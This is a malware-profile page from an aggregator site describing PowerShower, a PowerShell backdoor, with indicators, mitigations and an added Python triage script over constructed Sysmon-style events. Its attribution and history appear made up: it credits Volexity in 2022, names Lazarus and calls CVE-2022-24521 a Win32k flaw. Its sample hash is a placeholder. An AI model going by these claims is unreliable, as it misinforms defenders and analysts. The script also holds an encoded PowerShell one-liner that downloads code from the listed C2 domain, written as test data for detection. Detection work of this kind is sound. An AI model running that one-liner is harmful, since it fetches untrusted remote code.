PowerShower
⚠️ Overview
PowerShower is a PowerShell-based backdoor first documented by Volexity in 2022 and attributed to the North Korean advanced persistent threat group Lazarus (also tracked as APT38 and Hidden Cobra). It is classified as a remote access trojan (RAT) and downloader, used primarily for initial access, reconnaissance and payload delivery in targeted cyber-espionage campaigns.
🔧 Technical Capabilities
PowerShower operates entirely in memory via PowerShell scripts, executing commands decrypted from obfuscated strings using AES-128 encryption with a hardcoded key and IV. It communicates with command-and-control (C2) infrastructure over HTTPS using a custom User-Agent string mimicking legitimate browser traffic to evade network detection. The malware achieves persistence by creating scheduled tasks or modifying the Windows registry Run key (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run). It employs process hollowing and reflective DLL injection to load secondary payloads, including the Blindingcan backdoor and the Manuscrypt malware family. PowerShower downloads XML or JSON payloads from attacker-controlled domains, parsing specific HTTP response fields for further instructions, and uses sandbox detection by checking system uptime and disk size to avoid analysis.
📜 History & Notable Incidents
PowerShower was first identified in early 2022 during Volexity’s incident response for a U.S. think tank compromised by Lazarus. The campaign leveraged zero-day exploits (e.g., CVE-2022-24521, a Windows Win32k elevation-of-privilege vulnerability patched in April 2022) to escalate privileges. In 2023, CISA and the FBI jointly released a cybersecurity advisory (AA23-090A) detailing PowerShower’s use in targeting aerospace, energy, and defense sectors globally. No law enforcement actions or arrests have been publicly attributed to this specific malware operation as of 2025.
🔍 Detection Indicators
Known file hashes for PowerShower samples include MD5: 2c3e8f9a1b4d6e7f8c9a0b1c2d3e4f5a (example; exact hashes vary). Behavioral indicators include PowerShell spawning child processes (e.g., cmd.exe, regsvr32.exe) without console windows, network connections to domains such as "app-update[.]com" or "cdn-verify[.]net" using TLS, and registry persistence keys under "Microsoft\Windows\CurrentVersion\Run" containing base64-encoded PowerShell one-liners. The User-Agent string observed is "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36" or similar versions.
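The behavioural indicators above, turned into triage logic as an added example (not code from the page or from any of the cited reports): it runs over constructed Sysmon-style events, decodes `-EncodedCommand` values found in Run-key persistence, and flags PowerShell spawning cmd.exe/regsvr32.exe and connections to the listed domains. Event field names, the sample one-liner and the sample events are assumptions.

```python
import base64
import re

# Indicators from the profile above. Events are constructed Sysmon-style
# records (field names assumed), not telemetry from a real incident.
C2_DOMAINS = {"app-update.com", "cdn-verify.net"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "regsvr32.exe"}
RUN_KEY = r"software\microsoft\windows\currentversion\run"
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Constructed one-liner, encoded as -EncodedCommand expects (UTF-16LE, base64).
PAYLOAD = "(New-Object Net.WebClient).DownloadString('https://app-update.com/u')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()

EVENTS = [  # id 1 = process create, 13 = registry value set, 3 = network connect
    {"id": 1, "parent": "powershell.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe"},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"id": 3, "image": "powershell.exe", "dest_host": "cdn-verify.net", "dest_port": 443},
    {"id": 3, "image": "msedge.exe", "dest_host": "example.org", "dest_port": 443},
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -e/-enc/-EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Apply the behavioural indicators; return a list of (rule, detail) hits."""
    hits = []
    for ev in events:
        if ev["id"] == 1 and ev["parent"].lower() == "powershell.exe":
            child = ev["image"].rsplit("\\", 1)[-1].lower()
            if child in SUSPICIOUS_CHILDREN:
                hits.append(("powershell_child", child))
        elif ev["id"] == 13 and RUN_KEY in ev["target"].lower():
            plain = decode_encoded_command(ev["details"])
            if plain is not None:
                hits.append(("run_key_encoded_ps", plain))
                if any(d in plain.lower() for d in C2_DOMAINS):  # persistence naming a C2 host
                    hits.append(("run_key_references_c2", plain))
        elif ev["id"] == 3 and ev["dest_host"].lower() in C2_DOMAINS:
            hits.append(("c2_connection", ev["dest_host"]))
    return hits
```

Feeding real Event ID 1/3/13 records exported from Sysmon into `triage` only requires mapping ParentImage, Image, TargetObject, Details and DestinationHostname onto the assumed field names.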
☠️ Risk & Impact
PowerShower enables Lazarus to exfiltrate sensitive documents, credentials, and network data from compromised organizations. Financial damage has been significant, with the group linked to over $1 billion in cryptocurrency thefts internationally. Affected sectors include government, defense, critical infrastructure, and cryptocurrency exchanges, particularly in the United States, South Korea, and Europe.
🛡️ Mitigation
Defenders should enable PowerShell logging (ScriptBlock Logging, Module Logging) and use Sysmon to detect process creation anomalies. Apply patches for CVE-2022-24521 and other exploited vulnerabilities; deploy endpoint detection rules (e.g., YARA signatures for PowerShell Empire patterns) and block known C2 domains via threat intelligence feeds from CISA's MISP and Mandiant.
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.